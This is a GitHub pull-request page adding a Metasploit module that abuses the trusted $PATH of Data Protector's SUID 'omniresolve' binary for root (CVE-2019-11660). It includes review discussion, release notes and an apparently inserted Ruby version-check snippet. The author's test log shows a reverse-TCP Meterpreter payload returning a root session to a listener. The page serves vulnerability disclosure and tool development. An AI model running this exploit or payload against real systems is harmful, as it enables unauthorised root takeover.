Add Linux Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660) #12382

Merged
merged 12 commits into from
Nov 1, 2019

Conversation

s7u55

@s7u55 s7u55 commented Oct 1, 2019

Add Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660).

  This module exploits the trusted $PATH environment
  variable of the SUID binary `omniresolve` in
  Micro Focus (HPE) Data Protector A.10.40 and prior.

  The `omniresolve` executable calls the `oracleasm` binary using
  a relative path and the trusted $PATH, which allows an attacker
  to execute a custom binary with `root` privileges.

s7u55 and others added 6 commits October 2, 2019 11:42
@h00die h00die changed the title Add Privilege Escalation Module (CVE-2019-11660) Add Linux Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660) Oct 2, 2019
Co-Authored-By: Valeri Melnikov <MelnikoffVA@yandex.ru>

@bcoles bcoles left a comment


LGTM. Ready for testing.

@s7u55

s7u55 commented Oct 3, 2019

Test against Micro Focus Data Protector 10.40

msf5 exploit(multi/handler) > use exploit/linux/local/omniresolve_suid_priv_esc
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > show options

Module options (exploit/linux/local/omniresolve_suid_priv_esc):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   SESSION                                yes       The session to run this module on.
   SUID_PATH  /opt/omni/lbin/omniresolve  yes       Path to suid executable omniresolve


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Micro Focus (HPE) Data Protector <= 10.40 build 118


msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set lhost eth0

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set session 1
session => 1

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > check
[+] The target is vulnerable.
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > run

[*] Started reverse TCP handler on 192.168.0.108:4444 
[*] Sending stage (3021284 bytes) to 192.168.0.110
[*] Meterpreter session 2 opened (192.168.0.108:4444 -> 192.168.0.110:36754) at 2019-10-03 14:37:43 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.110
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.21.2.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Test against Micro Focus Data Protector 10.50 (Patched version)

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.0.108:4444 
[-] omniresolve version 10.40 build 125 is not vulnerable
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > 

The vendor changed omniresolve build, but not the version in DP 10.50.

@bcoles bcoles added the needs-testing-environment PRs that need community testing and/or vulnerable test targets before they're able to be landed label Oct 24, 2019
@s7u55

s7u55 commented Oct 29, 2019

The older versions are not available on the official website.
I can upload one somewhere if you need.

@bcoles

bcoles commented Oct 29, 2019

> The older versions are not available on the official website.
> I can upload one somewhere if you need.

Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .

@s7u55

s7u55 commented Oct 30, 2019

>> The older versions are not available on the official website.
>> I can upload one somewhere if you need.
>
> Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .

Have you received the link?

@bcoles

bcoles commented Oct 31, 2019

>>> The older versions are not available on the official website.
>>> I can upload one somewhere if you need.
>>
>> Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .
>
> Have you received the link?

Yes, thanks, I'll take a look between now and Sunday (probably earlier). Please update the ForceExploit functionality, as per above, if you have time.

@bcoles bcoles self-assigned this Oct 31, 2019
@bcoles

bcoles commented Nov 1, 2019

Hi @s7u55

Tested successfully on CentOS 7 (x64).

I've made some small changes in c6e739c. I hope you're ok with the changes. Please let me know, else I'll proceed with landing this PR.

The changes mostly consist of:

  • minor formatting for module description
  • updating ForceExploit as discussed above
  • changed @ instance variables to local variables
  • appended echo to the cmd_exec call to fix a stupid bug related to framework command tokenisation (Command tokenisation is failing on bash command shells #12485; unrelated to this module) which caused the specified session to die if the session was a command shell session.
  • change print_ methods in check to vprint_
  • print the omniresolve version in check, regardless of whether the version is vulnerable
  • return Appears, rather than Vulnerable, as the vulnerability is inferred, rather than confirmed.
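Added example, not the module's own code: a Ruby version gate in the spirit of the `check` behaviour described above and the patched-target test earlier in this thread (the module reports "Appears" rather than "Vulnerable" because the verdict is inferred from the version). The banner format `omniresolve version 10.40 build 125` is assumed from the console output quoted in the thread, and the cut-off `<= 10.40 build 118` comes from the module's target list.

```ruby
# Added example (not the Metasploit module's own code). Assumed banner
# format: "omniresolve version 10.40 build 125", as quoted in the PR thread.
OMNIRESOLVE_VERSION_RE = /version\s+(\d+)\.(\d+)\s+build\s+(\d+)/i

# Last vulnerable release per the module's target list: "<= 10.40 build 118".
MAX_VULN_VERSION = [10, 40].freeze
MAX_VULN_BUILD   = 118

# Parse the banner into [major, minor, build]; nil if it does not match.
def parse_omniresolve_version(banner)
  m = OMNIRESOLVE_VERSION_RE.match(banner)
  return nil unless m
  m.captures.map(&:to_i)
end

# DP 10.50 kept omniresolve at version 10.40 but raised the build number
# (10.40 build 125), so a version-only comparison would misreport the
# patched binary as vulnerable. The build is compared only on a version tie.
def omniresolve_vulnerable?(major, minor, build)
  cmp = [major, minor] <=> MAX_VULN_VERSION
  return true  if cmp < 0
  return false if cmp > 0
  build <= MAX_VULN_BUILD
end

# Verdict modelled on the check described in the thread:
#   :appears -> at or below 10.40 build 118 (inferred, not confirmed)
#   :safe    -> newer version or build
#   :unknown -> banner could not be parsed
def omniresolve_check(banner)
  v = parse_omniresolve_version(banner)
  return :unknown if v.nil?
  omniresolve_vulnerable?(*v) ? :appears : :safe
end

if __FILE__ == $PROGRAM_NAME
  # Constructed banners based on the console output quoted above.
  ['omniresolve version 10.40 build 118',
   'omniresolve version 10.40 build 125',
   'omniresolve version 10.30 build 200',
   'not a version banner'].each do |b|
    puts "#{b.inspect} => #{omniresolve_check(b)}"
  end
end
```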

@bcoles bcoles removed the needs-testing-environment PRs that need community testing and/or vulnerable test targets before they're able to be landed label Nov 1, 2019
@s7u55

s7u55 commented Nov 1, 2019

Hello.
That's perfect, thanks.

@bcoles bcoles merged commit b08e031 into rapid7:master Nov 1, 2019
@bcoles

bcoles commented Nov 1, 2019

> Hello.
> That's perfect, thanks.

Cool. Landed in master. Unfortunately I think we've missed the point release for this week. It will be in next week's release.

@bcoles bcoles added the rn-modules release notes for new or majorly enhanced modules label Nov 1, 2019
@bcoles

bcoles commented Nov 1, 2019

Release Notes

Add Micro Focus (HPE) Data Protector Privilege Escalation module for CVE-2019-11660. This module exploits the omniresolve SUID root executable installed as part of Data Protector to gain root privileges by abusing a trusted $PATH.

@s7u55 s7u55 deleted the add-omniresolve-module branch November 2, 2019 14:12
Labels
docs module rn-modules release notes for new or majorly enhanced modules